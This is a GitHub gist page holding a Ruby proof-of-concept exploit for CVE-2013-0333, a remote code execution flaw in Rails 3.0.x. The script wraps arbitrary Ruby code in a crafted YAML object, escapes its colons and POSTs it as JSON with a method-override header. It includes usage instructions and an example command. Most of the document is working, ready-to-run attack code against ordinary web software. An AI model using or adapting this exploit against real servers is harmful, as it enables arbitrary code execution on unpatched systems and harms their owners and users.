-
-
Save matiasinsaurralde/b431f81769af117ca5805daac32f256e to your computer and use it in GitHub Desktop.
Proof-of-Concept exploit for the new Rails Remote Code Execution vulnerability (CVE-2013-0333)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# | |
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333) | |
# | |
# ## Advisory | |
# | |
# https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo | |
# | |
# ## Caveats | |
# | |
# * Does not support Ruby 1.8.7. | |
# * Only tested against Rails 3.0.x. | |
# | |
# ## Synopsis | |
# | |
# $ rails_omakase.rb URL RUBY | |
# | |
# ## Dependencies | |
# | |
# $ gem install ronin-support | |
# | |
# ## Example | |
# | |
# $ rails_omakase.rb http://localhost:3000/secrets "puts 'lol'" | |
# | |
# ### config/routes.rb | |
# | |
# resources :secrets | |
# | |
# ### app/controllers/secrets_controller.rb | |
# | |
# def show | |
# p params | |
# end | |
# | |
# ## License | |
# | |
# Copyright (c) 2013 Postmodern | |
# | |
# This exploit is free software: you can redistribute it and/or modify | |
# it under the terms of the GNU General Public License as published by | |
# the Free Software Foundation, either version 3 of the License, or | |
# (at your option) any later version. | |
# | |
# This exploit is distributed in the hope that it will be useful, | |
# but WITHOUT ANY WARRANTY; without even the implied warranty of | |
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
# GNU General Public License for more details. | |
# | |
# You should have received a copy of the GNU General Public License | |
# along with this exploit. If not, see <http://www.gnu.org/licenses/>. | |
# | |
# ## Shoutz | |
# | |
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch, | |
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern, | |
# mephux, nullthreat, evoltech, flatline, r0bglesson, lianj, @bascule, | |
# @charliesome, @homakov, @envygeek, @nzkoz, @technoweenie (for adding | |
# ActiveSupport::JSON::Backends::Yaml and making it the default), | |
# @bitsweat (for exposing the vulnerability), @j2h (for removing | |
# ActiveSupport::JSON in favour of multi-json), @dhh, Omakase, YAML, | |
# Kreayshawn, Lil Debbie, Boxxy, Stimulator, "rockin' the wolf on your noggin", | |
# Cholombiano Style, Russian Parallel Cinema, SophSec crew and affiliates. | |
# | |
require 'ronin/network/http' | |
require 'ronin/formatting/html' | |
require 'ronin/ui/output' | |
require 'yaml' | |
include Ronin::Network::HTTP | |
include Ronin::UI::Output::Helpers | |
def exploit(url,payload) | |
payload = "(#{payload}; @executed = true) unless @executed" | |
escaped_payload = "foo\nend\n#{payload}\n__END__\n" | |
encoded_payload = escaped_payload.to_yaml.sub('--- ','').chomp | |
yaml = %{ | |
--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection | |
? #{encoded_payload} | |
: !ruby/struct | |
defaults: | |
:action: create | |
:controller: foos | |
required_parts: [] | |
requirements: | |
:action: create | |
:controller: foos | |
segment_keys: | |
- :format | |
}.strip | |
encoded_yaml = yaml.gsub(':','\u003a') | |
return http_post( | |
:url => url, | |
:headers => { | |
:content_type => 'application/json', | |
:x_http_method_override => 'get' | |
}, | |
:body => encoded_yaml | |
) | |
end | |
if $0 == __FILE__ | |
unless ARGV.length >= 2 | |
$stderr.puts "usage: #{$0} URL RUBY" | |
exit -1 | |
end | |
url = ARGV[0] | |
payload = ARGV[1] | |
print_info "POSTing #{payload} to #{url} ..." | |
response = exploit(url,payload) | |
case response.code | |
when '200' then print_info "Success!" | |
when '500' then print_error "Error!" | |
else print_error "Received response code #{response.code}" | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment